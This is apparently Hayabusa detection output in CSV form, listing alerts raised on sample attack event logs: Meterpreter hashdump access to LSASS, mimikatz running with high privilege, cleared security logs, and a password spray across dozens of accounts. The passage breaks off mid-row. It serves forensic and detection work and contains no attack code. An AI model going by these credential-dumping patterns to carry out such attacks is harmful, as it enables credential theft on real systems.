365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 
365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in 
LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 18:08:22.618 +00:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 
0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 18:08:29.138 +00:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-04-30 19:27:00.297 +00:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:02.847 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:02.847 +00:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:zmathis/jlake/melliott/jkulikowski/lschifano/kperryman/tbennett/cdavis/psmith/dpendolino/bking/eskoudis/celgee/cspizor/rbowes/cragoso/dmashburn/bgalbraith/cmoody/smisenar/wstrzelec/ebooth/jwright/lpesce/bhostetler/jorchilles/mtoussain/econrad/sanson/mdouglas/bgreenwood/jleytevidal/sarmstrong/baker/ssims/thessman/drook/cfleener/Administrator/edygert/gsalinas IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-04-30 19:27:03.925 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:05.020 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:06.085 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:07.171 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:08.254 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:09.323 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:10.377 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:11.465 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:12.549 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:13.611 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:14.687 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:15.750 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:16.841 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:17.922 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:19.035 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:20.097 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:21.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:22.222 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:23.295 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:24.342 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:25.404 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:26.504 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:27.583 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:28.654 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:29.712 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:30.787 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:31.861 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:32.955 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:34.020 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:35.081 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:36.151 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:37.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:38.310 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:39.393 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:40.457 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:41.553 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:42.613 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:43.686 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:44.738 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:45.818 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:46.896 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:47.953 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:49.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:50.082 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:51.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:52.214 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:53.285 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:54.354 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:55.438 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:56.513 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:57.578 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:58.661 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 